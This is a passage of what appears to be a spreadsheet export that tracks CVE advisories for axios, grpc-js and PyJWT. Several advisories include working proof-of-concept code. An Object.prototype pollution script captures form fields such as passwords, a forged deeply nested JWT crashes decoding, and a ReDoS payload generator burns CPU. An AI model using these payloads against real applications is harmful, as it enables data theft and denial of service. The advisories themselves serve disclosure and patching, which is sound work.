```js
import http from 'node:http';
import axios from 'axios';
const server = http.createServer((req, res) =&gt; {
  res.end(JSON.stringify({
    authorization: req.headers.authorization || null,
    xGood: req.headers['x-good'] || null
  }));
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
const { port } = server.address();
Object.prototype.headers = {
  Authorization: 'Bearer POLLUTED'
};
try {
  const res = await axios.get(`http://127.0.0.1:${port}/`, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
  console.log(res.data);
} finally {
  delete Object.prototype.headers;
  server.close();
}
```
The result I get is:
```json
{
  "authorization": "Bearer POLLUTED",
  "xGood": null
}
```
So the polluted Authorization header is sent, and the normal axios header is not.
Changing the fetch call to pass the already resolved options fixes it for me:
```diff
- _fetch(request, fetchOptions)
+ _fetch(request, resolvedOptions)
```
`resolvedOptions` already includes `...fetchOptions`, so custom fetch options should still work, while headers, method, body, and signal stay as clean own values.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101908</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D606" s="5" t="inlineStr"/>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M606" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q606" s="5" t="inlineStr"/>
      <c r="R606" s="5" t="inlineStr"/>
      <c r="S606" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios form serialization reads `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob` from an internal options object without own-property guards. When `Object.prototype` has been polluted elsewhere in the same process, those inherited values can change how axios serializes multipart and URL-encoded request bodies.
Axios does not create the prototype pollution source. This is a read-side gadget: axios turns an existing same-process pollution condition into altered request serialization or request failures.
## Impact
The impact depends on which property is polluted and which axios serialization path the application uses.
Polluted `dots`, `indexes`, or `metaTokens` can change field names and cause the receiving service to parse different data than the caller intended. Polluted `maxDepth` can cause nested form submissions to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`, producing request-level or service-level denial of service for affected workflows. Polluted `visitor` can execute as the serializer visitor if an attacker can place a function on `Object.prototype`, but that condition generally implies a stronger same-process code-execution or malicious-dependency primitive and should be described carefully.
## Affected Functionality
Affected:
- `axios.toFormData()`.
- `transformRequest` paths that serialize plain objects to `multipart/form-data`.
- URL-encoded form serialization paths that rely on the same helper.
- `formSerializer` option defaults when the relevant properties are absent as own properties.
Not affected:
- JSON request bodies.
- Requests that do not invoke `toFormData()`.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/helpers/toFormData.js` merges caller options with defaults using `utils.toFlatObject()`. When `options` is `undefined`, `toFlatObject()` returns the default object unchanged:
```js
{
  metaTokens: true,
  dots: false,
  indexes: false
}
```
That default object has `Object.prototype` in its prototype chain. `toFormData()` then reads behavior-affecting values directly:
```js
const metaTokens = options.metaTokens;
const visitor = options.visitor || defaultVisitor;
const dots = options.dots;
const indexes = options.indexes;
const _Blob = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);
const maxDepth = options.maxDepth === undefined ? DEFAULT_FORM_DATA_MAX_DEPTH : options.maxDepth;
```
These reads can resolve inherited polluted properties.
Local code review confirmed the direct reads in `v1.18.1`. Tag checks show the option-based form serializer exists in `v0.28.0` and later; `maxDepth` appears in the `1.x` line from the form recursion fix.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.maxDepth = 1;
await axios.post(url, { a: { b: { c: 'value' } } }, {
  headers: { 'Content-Type': 'multipart/form-data' }
});
```
Expected safe behavior is that the default max depth is used unless the caller sets an own `formSerializer.maxDepth`. Current behavior reads the inherited value and can throw `ERR_FORM_DATA_DEPTH_EXCEEDED`.
For serializer alteration, polluting `Object.prototype.dots = true` changes nested field naming from bracket notation to dot notation when the caller did not opt into that behavior.
## Workarounds
Avoid serializing attacker-controlled objects as form data in a process with known prototype pollution. As a partial mitigation, callers can pass an own `formSerializer` object that sets explicit safe values for all relevant keys, including `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
_axios v1.18.1 contains a read-side prototype pollution gadget in its form data serialization logic. Six option properties (`visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, `Blob`) are read from a plain JavaScript object that inherits from `Object.prototype` without `hasOwnProperty` guards. When `Object.prototype` has been polluted elsewhere in the process a common consequence of compromised transitive npm dependencies, these polluted values silently control axios' form serialization behavior._
_The highest-impact gadget is `visitor`: a polluted function on `Object.prototype.visitor` is invoked for every key-value pair during multipart and URL-encoded form serialization, receiving the value, key, path, and internal helper functions as arguments._
### Details
#### Root Cause
_The attack chain has three steps:_
_**Step 1:  `formSerializer` is read safely, but `undefined` flows through**_
_In `lib/defaults/index.js`, the default `transformRequest` function reads `formSerializer` from config using the `own()` helper, which enforces `hasOwnProp`:_
```js
const formSerializer = own(this, 'formSerializer');
```
_When the user does not explicitly configure `formSerializer`, this correctly returns `undefined`. That `undefined` is then passed as the `options` parameter to `toFormData()`:_
```js
return toFormData(data, _FormData &amp;&amp; new _FormData(), formSerializer);
//                                                     ^^^^^^^^^^^^ undefined
```
_**Step 2: `toFlatObject` returns a plain-object default**_
_Inside `lib/helpers/toFormData.js`, `options` (which is `undefined`) is merged with defaults via `utils.toFlatObject()`:_
```js
options = utils.toFlatObject(
    options,                                    // undefined
    { metaTokens: true, dots: false, indexes: false },  // plain object literal
    false,
    function defined(option, source) {
        return !utils.isUndefined(source[option]);
    }
);
```
_`toFlatObject` has an early-return for null/undefined sources:_
```js
// lib/utils.js:607
if (sourceObj == null) return destObj;
```
_Since `options` is `undefined`, the function returns `destObj` unchanged — the plain object `{ metaTokens: true, dots: false, indexes: false }`. This object's prototype is `Object.prototype`._
_**Step 3: Options are read without `hasOwnProp` guards**_
_The six option properties are read directly from the plain object:_
```js
const metaTokens = options.metaTokens;                                          // line 117
const visitor    = options.visitor || defaultVisitor;                            // line 119
const dots       = options.dots;                                                // line 120
const indexes    = options.indexes;                                             // line 121
const _Blob      = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);       // line 122
const maxDepth   = options.maxDepth === undefined                                // line 123
                     ? DEFAULT_FORM_DATA_MAX_DEPTH
                     : options.maxDepth;
```
_None of these reads use `utils.hasOwnProp()`. Since the `options` object inherits from `Object.prototype`, any property set on `Object.prototype` by a compromised dependency is resolved through the prototype chain._
#### Why the Existing Defenses Didn't Catch This
_axios has extensive prototype pollution defenses. However, those defenses are all focused on the **config** object (created by `mergeConfig`, which returns `Object.create(null)`). The `toFormData` function creates its own internal options object that sits outside that boundary, and the 6 reads on that internal object were never audited._
### PoC
#### Reproduction Steps
#### Environment
_Any environment with Node.js and npm. Tested on:_
_- Node.js v24.15.0, npm 11.13.0_
_- axios v1.18.1 (latest release at time of writing)_
##### Step 1: Create a fresh project
```bash
mkdir axios-pp-poc
cd axios-pp-poc
npm init -y
npm install axios@1.18.1
```
##### Step 2: Create the PoC file
_Create `poc.mjs` with the following content:_
```js
import axios from 'axios';
import http from 'http';
// Simulate pollution from a compromised transitive dependency
let stolen = [];
Object.prototype.visitor = function(value, key, path, helpers) {
    stolen.push({ key, value });
    return helpers.defaultVisitor.call(this, value, key, path);
};
Object.prototype.maxDepth = 2;
const server = http.createServer((req, res) =&gt; {
    res.writeHead(200);
    res.end('{}');
});
server.listen(0, '127.0.0.1', async () =&gt; {
    const { port } = server.address();
    try {
        // Exfiltration: visitor intercepts all form fields
        await axios.post(`http://127.0.0.1:${port}/`, {
            username: 'john',
            password: 'SuperSecret123!',
            profile: { ssn: '123-45-6789' }
        }, { headers: { 'Content-Type': 'multipart/form-data' } });
        console.log('Stolen:', stolen);
        // Stolen: [
        //   { key: 'username', value: 'john' },
        //   { key: 'password', value: 'SuperSecret123!' },
        //   { key: 'profile',  value: { ssn: '123-45-6789' } },
        //   { key: 'ssn',      value: '123-45-6789' }
        // ]
        // DoS: nested object rejected by polluted maxDepth
        await axios.post(`http://127.0.0.1:${port}/`,
            { a: { b: { c: { d: 'value' } } } },
            { headers: { 'Content-Type': 'multipart/form-data' } }
        );
        // Throws: ERR_FORM_DATA_DEPTH_EXCEEDED
        //   "Object is too deeply nested (3 levels). Max depth: 2"
    } finally {
        delete Object.prototype.visitor;
        delete Object.prototype.maxDepth;
        server.close();
    }
});
```
##### Step 3: Run the PoC
```bash
node poc.mjs
```
### Impact
#### 1. Data Exfiltration via `visitor` (Confidentiality: High)
_A polluted `Object.prototype.visitor` function is called as the form data visitor:_
```js
visitor.call(formData, el, key, path, exposedHelpers)
```
_The attacker receives:_
_- **`value`** — the raw value being serialized (passwords, tokens, PII, API keys)_
_- **`key`** — the field name_
_- **`path`** — the full path array (e.g., `['profile', 'address', 'street']`)_
_- **`exposedHelpers`** — internal helpers including `defaultVisitor`, `convertValue`, `isVisitable`_
_By delegating to `helpers.defaultVisitor`, the attack is completely transparent, the request succeeds normally and the server receives intact data. The exfiltration is invisible to both the caller and the server._
#### 2. Denial of Service via `maxDepth` (Availability: Low)
_A polluted `Object.prototype.maxDepth` of `1` or `2` causes any moderately nested form data request to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`. Applications that send nested objects as form data (common with APIs that accept `profile[name]`, `address[city]`, etc.) will experience mysterious failures._
#### 3. Data Corruption via `dots`, `indexes`, `metaTokens` (Integrity: Low)
_Polluting these options changes the serialization format of form field names:_
_- **`dots: true`** — changes bracket notation (`user[name]`) to dot notation (`user.name`)_
_- **`indexes: true`** — changes array serialization (`items[]`) to indexed (`items[0]`, `items[1]`)_
_- **`metaTokens: false`** — changes `obj{}` keys to raw json strings_
_The server may misinterpret the submitted form data, leading to silent data corruption._
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101915</t>
        </is>
      </c>
      <c r="D607" s="5" t="inlineStr"/>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M607" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q607" s="5" t="inlineStr"/>
      <c r="R607" s="5" t="inlineStr"/>
      <c r="S607" s="5" t="inlineStr">
        <is>
          <t>### Impact
If an application method handler crashes, the error message is included in the status message sent to the client. This can leak to the client any sensitive data that may be included in the error message. This impacts anyone using `@grpc/grpc-js` to run servers.
### Patches
This vulnerability is fixed in 1.13.6 and 1.14.5.
### Workarounds
This can be avoided by using a top-level error handler in method handlers to strip out sensitive error information.</t>
        </is>
      </c>
      <c r="T607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101915</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D608" s="5" t="inlineStr"/>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M608" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q608" s="5" t="inlineStr"/>
      <c r="R608" s="5" t="inlineStr"/>
      <c r="S608" s="5" t="inlineStr">
        <is>
          <t>### Impact
When server credentials are created with the `requireClientCertificate` option set to `false`, `getAuthContext` does not distinguish between authorized and unauthorized certificates in its return value. This can create improper authentication vulnerabilities for `@grpc/grpc-js` users who use the result of `getAuthContext` for authentication.
In particular, `@grpc/grpc-js-xds` can both set the `requireClientCertificate` option to `false` and use the return value of `getAuthContext` for RBAC authentication in some configurations.
### Patches
This vulenrability is fixed in 1.13.6 and 1.14.5.
### Workarounds
`@grpc/grpc-js` users using `getAuthContext` this way can avoid this problem by setting `requireClientCertificate` to `true`. `@grpc/grpc-js-xds` users using RBAC can avoid this by setting the `require_client_certificate` field to `true` in the DownstreamTlsContext in the xDS configuration.</t>
        </is>
      </c>
      <c r="T608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101918</t>
        </is>
      </c>
      <c r="D609" s="5" t="inlineStr"/>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M609" s="5" t="inlineStr">
        <is>
          <t>2.15.0</t>
        </is>
      </c>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q609" s="5" t="inlineStr"/>
      <c r="R609" s="5" t="inlineStr"/>
      <c r="S609" s="5" t="inlineStr">
        <is>
          <t>## Summary
`PyJWKClient.get_signing_key_from_jwt(token)` — the first step of the JWKS
verification flow documented in `docs/usage.rst` — must decode a token's
payload before its signature can be checked, via
`jwt.api_jwt.decode_complete(token, options={"verify_signature": False})`.
That call parses the payload with `json.loads` in `PyJWT._decode_payload`
(`jwt/api_jwt.py:297-300`), whose `except` clause catches only `ValueError`.
A payload that is valid JSON but nested ~20,000 levels deep makes
`json.loads` raise `RecursionError`, which is **not** a `ValueError` and
escapes as a raw, undocumented exception type — not `DecodeError`,
`InvalidTokenError`, or `PyJWTError`, so every documented error-handling
pattern in `docs/usage.rst` misses it.
The token needs no valid signature and no network access — the crash
happens during payload parsing, before the `kid` is even looked up. A
single unauthenticated ~50KB request crashes the caller's auth handler
(HTTP 500 / dead worker), repeatably. The same path is reachable through
plain `jwt.decode(token, options={"verify_signature": False})` too.
Notably, this project already fixed the **identical** bug class for the
JWS **header** path — `PyJWS._load` catches `(ValueError, RecursionError)`
and wraps it in `DecodeError` (`jwt/api_jws.py:360-361`), and
`CHANGELOG.rst` (v2.14.0, "Security") states "Handle deeply nested and
malformed JWS/JWK input without uncaught recursion errors." The payload
path — the one part of a forged token an unauthenticated attacker fully
controls — was left catching `ValueError` alone, so that security fix does
not fully hold.
A second, related instance: `PyJWKClient.fetch_data` (`jwt/jwks_client.py:168`)
parses a JWKS endpoint's response with `json.load(response)` inside a
`try` that only catches `(URLError, TimeoutError, http.client.HTTPException)`
— a deeply-nested JSON response from a JWKS endpoint raises the same raw
`RecursionError`, uncaught entirely (worse than the payload path, which at
least caught plain `ValueError`).
**Affected versions:** confirmed present in the current release, 2.14.0,
and on the current `master` branch (commit `4adcd02722f5011c60079d3978dfc167b9a8eaa5`).
## Reproduction
```python
import base64, json, jwt
def b64url(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=")
header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
payload = b64url(b"[" * 20_000 + b"]" * 20_000)
token = (header + b"." + payload + b"." + b64url(b"forged-sig")).decode()
jwt.decode(token, options={"verify_signature": False})
# raises: RecursionError (not DecodeError/InvalidTokenError/PyJWTError)
```
Control: the same deeply-nested structure moved into the token's **header**
instead of its payload is correctly converted to `jwt.DecodeError` by the
already-hardened `jwt/api_jws.py:360` — confirming the payload path is
specifically the missed half of the v2.14.0 hardening, not a general gap.
## Impact assessment
Unauthenticated denial-of-service via unhandled exception on an auth path.
Not an auth bypass — rated medium. With signature verification enabled,
this parse runs after `_verify_signature`, so only the pre-verification
paths (`get_signing_key_from_jwt`, explicit `verify_signature=False`) are
attacker-reachable pre-auth; the JWKS-endpoint variant requires control of
(or a MITM on) the configured JWKS endpoint rather than being reachable
from an arbitrary client token.
## Suggested fix
In `jwt/api_jwt.py:299`, change `except ValueError as e:` to
`except (ValueError, RecursionError) as e:`, mirroring
`jwt/api_jws.py:360` exactly. In `jwt/jwks_client.py`, add the same
`(ValueError, RecursionError)` handling around `json.load(response)` in
`fetch_data`, raising `PyJWKClientError` (consistent with the method's
existing documented error contract). A patch implementing both, verified
against the full test suite (457 passed, 4 skipped — pre-existing,
environment-related) and against the reproduction above (now correctly
raises `DecodeError`), is attached (`fix.patch`).
## Discovery method
Found and verified using `scopegrep` (https://github.com/not-ekalabya/scopegrep)
— a semantic code-retrieval tool that surfaces every other call site of a
symbol alongside relevance-ranked results, which is what surfaced the
already-hardened header path as the direct comparison here — paired with
an LLM coding agent (GLM-5.3) run as an open-ended security review of this
repository. Independently reproduced against the exact commit above before
this report was written. Happy to share the full session transcript on
request.
## Disclosure status
Not shared with any other party or published. Submitting through this
private channel per the project's stated security policy; no planned
public/conference disclosure ahead of a coordinated timeline.
---
## Maintainer triage update (2026-09-22)
### Confirmed finding and scope
We confirmed that an attacker-controlled recursively nested JWT payload can cause a raw Python `RecursionError` to escape PyJWT at PyJWT 2.14.0 and the tested current source. The confirmed in-scope paths are direct decoding with `verify_signature=False` and `PyJWKClient.get_signing_key_from_jwt`, where payload parsing occurs before key lookup.
The demonstrated impact is limited to an uncaught exception for the affected call, which may surface as an application HTTP 500 when the application does not catch it. Testing did not demonstrate a worker or process crash, persistent resource exhaustion, resource amplification, authentication bypass, or confidentiality or integrity impact.
The separate JWKS-response subclaim is out of scope under the policy boundary that requires the application to trust its configured JWKS source and transport. The confirmed payload finding is not a duplicate of the earlier protected-header parser finding: it occurs in a distinct payload parsing path that remained affected after the earlier header-only fix.
### Version and remediation status
Historical testing reproduced the confirmed payload behavior in all 20 official supported PyJWT 2.x releases from 2.0.0a1 through 2.14.0, inclusive. Unsupported PyJWT 1.7.1 also reproduces the behavior, but it is excluded from the advisory range under the supported-2.x policy. No supported unaffected release and no patched release exists. The exact evidence is `/Users/jpadilla/.codex/security-advisories/pyjwt/GHSA-42vr-xj54-vc7v-historical-range-20260922.md` (SHA-256 `c48f1ac35641e9382d53e6a879a71ad9a8fb4432bbe871f2b8330f8d166a2d81`) and `/Users/jpadilla/.codex/security-advisories/pyjwt/historical-range-42vr-20260922/historical-range-results.json` (SHA-256 `324997f231561bf6da39b8f9d1e272f69bfde8871a7863f5cb7b70e22e91f076`). The evidence-backed supported affected range is `&gt;= 2.0.0a1, &lt;= 2.14.0`.
Historical range verification is complete. A local fix commit exists and has passed independent review and the complete local CI suite, but it has not been merged into `master` or released. Consequently, `patched_versions` remains empty and this advisory remains in `triage`. The remaining next step is a maintainer decision on remediation and merge. After a fix lands in `master` and is released, `patched_versions` and advisory lifecycle can be updated in a separate approved batch.
---
## Maintainer remediation update (2026-09-23)
The confirmed payload-parser finding has been fixed on `master`. Commit
`5fde08a6cf906aa7698de2d6391d88b73006b17b` converts a recursive
payload parse failure to the expected `DecodeError`; commit
`9bc06658f875b9b40091539140bbbdc4639161c3` makes the regression tests
deterministic across supported Python versions. This update supersedes the
2026-09-22 remediation-status statement that the fix had not landed.
The original pre-verification payload reproducer and the
`PyJWKClient.get_signing_key_from_jwt` path were covered by regression tests.
The exact landed tree passed the full 39-environment local tox matrix and
GitHub CI for commit `9bc06658f875b9b40091539140bbbdc4639161c3` passed
all 25 jobs, including Ubuntu Python 3.14 and 3.15. The demonstrated impact
remains an uncaught request-level exception in affected releases; there is
still no evidence of process termination, persistent resource exhaustion,
authentication bypass, or confidentiality or integrity impact.
The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`. The latest
released version is 2.14.0, which predates these commits; no released
patched version exists yet, so `patched_versions` remains unset. CVSS v3.1
5.3 (Medium) and CWE-248 remain unchanged. The advisory may now move from
triage to private draft. The next lifecycle step is a new supported 2.x
release containing the fix, followed by separately approved patched-version
and publication updates after release verification.
---
## Maintainer release update (2026-09-23)
PyJWT 2.15.0 is the first released version containing the payload-parser fix. Its GitHub release tag points to commit `1d41a6478e1562e68ff667fcd703356acf085f68`, which includes fix commit `5fde08a6cf906aa7698de2d6391d88b73006b17b` and deterministic regression-test commit `9bc06658f875b9b40091539140bbbdc4639161c3`. PyPI published both the wheel and source distribution from that release commit through the successful production workflow at https://github.com/jpadilla/pyjwt/actions/runs/35891602963.
The published PyPI wheel (`pyjwt-2.15.0-py3-none-any.whl`, SHA-256 `7a3742debf6b879e912dbb9819ceec1594be812452b78c5f2e2dfc56564954f8`) was checked directly: the deeply nested unsigned payload now raises `DecodeError`, while an ordinary unsigned payload still decodes. The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`; the patched version is `2.15.0`. Earlier statements in this advisory that no released patched version exists are superseded by this update.
The confirmed impact remains an uncaught request-level exception in affected versions, not a demonstrated process crash or authentication bypass. The separate JWKS-response subclaim remains outside this advisory's confirmed PyJWT-owned scope.</t>
        </is>
      </c>
      <c r="T609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101918</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102270</t>
        </is>
      </c>
      <c r="D610" s="5" t="inlineStr"/>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M610" s="5" t="inlineStr">
        <is>
          <t>2.14.0</t>
        </is>
      </c>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q610" s="5" t="inlineStr"/>
      <c r="R610" s="5" t="inlineStr"/>
      <c r="S610" s="5" t="inlineStr">
        <is>
          <t>### Summary
There is a Re-DoS vulnerability in the `is_pem_format` function which results in a intesive CPU usage if an attacker is been able to provide a custom certificate.
### Details
The problem is that the lazy quantifier `.+?` will always first try to match as little as possible until it finds a `---- END`. Normally this means the complexity of this should be O(N). However, by providing an input which consists only of `----BEGIN CERTIFICATE-----` lines and no `---- END` line, the regex algorithm will first try to match the first line and then, with the lazy quantifier, all the lines until the end O(N), which then fails since it is unable to find a `---- END` line. It will then jump to the next line, resulting in N re-scans of the whole string, which means the complexity basically results in O(N²). 
### PoC
```python
import time
import re
BEGIN_LINE = b"-----BEGIN CERTIFICATE-----\n"
_PEMS = {
    b"CERTIFICATE",
    b"TRUSTED CERTIFICATE",
    b"PRIVATE KEY",
    b"PUBLIC KEY",
    b"ENCRYPTED PRIVATE KEY",
    b"OPENSSH PRIVATE KEY",
    b"DSA PRIVATE KEY",
    b"RSA PRIVATE KEY",
    b"RSA PUBLIC KEY",
    b"EC PRIVATE KEY",
    b"DH PARAMETERS",
    b"NEW CERTIFICATE REQUEST",
    b"CERTIFICATE REQUEST",
    b"SSH2 PUBLIC KEY",
    b"SSH2 ENCRYPTED PRIVATE KEY",
    b"X509 CRL",
}
_PEM_RE = re.compile(
    b"----[- ]BEGIN ("
    + b"|".join(_PEMS)
    + b""")[- ]----\r?
.+?\r?
----[- ]END \\1[- ]----\r?\n?""",
    re.DOTALL,
)
def is_pem_format(key: bytes) -&gt; bool:
    return bool(_PEM_RE.search(key))
def make_payload(num_headers: int) -&gt; bytes:
    return BEGIN_LINE * num_headers
def measure(num_headers: int) -&gt; float:
    payload = make_payload(num_headers)
    start = time.perf_counter()
    is_pem_format(payload)  # returns False, but burns CPU getting there
    elapsed = time.perf_counter() - start
    print(
        f"  headers={num_headers:&gt;4}  size={len(payload)//1024:&gt;3} KB"
        f"   time={elapsed*1000:&gt;7.1f} ms"
    )
    return elapsed
for n in (1000, 2000, 4000, 8000):
    measure(n)
```
### Impact
The attacker could use extensive resources, which could make the resource (e.g. a web server) unavailable.
### Maintainer update (2026-09-10): 
We reproduced the reported quadratic regex behavior on malformed PEM-like input: doubling repeated BEGIN lines produced approximately fourfold runtime growth, while equal-sized ordinary input remained negligible. The affected path is reached when an application passes attacker-controlled key or certificate bytes to PyJWT’s key preparation, and the impact is resource exhaustion. The fix is on master in commit 8b4e233a22206b34ec1186e912e75c0b2396ac07; it replaces the backtracking PEM regex with a bounded marker scan. Fresh Astra/max review accepted the fix and confirmed malformed, mixed-label, and valid-input controls. This is a distinct ReDoS finding from the later PEM-recognition report that shares the implementation commit. The fix has not yet shipped in a released PyJWT 2.x version, so this advisory is being moved to draft and remains unpublished pending release.
## Maintainer update — 2026-09-11
The verified fix for this advisory is included in PyJWT 2.14.0, released on 2026-09-11 and available on PyPI. PyJWT 2.14.0 is the first release containing the fix. This advisory is now published with the release recorded as the patched version.</t>
        </is>
      </c>
      <c r="T610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102270</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103500</t>
        </is>
      </c>
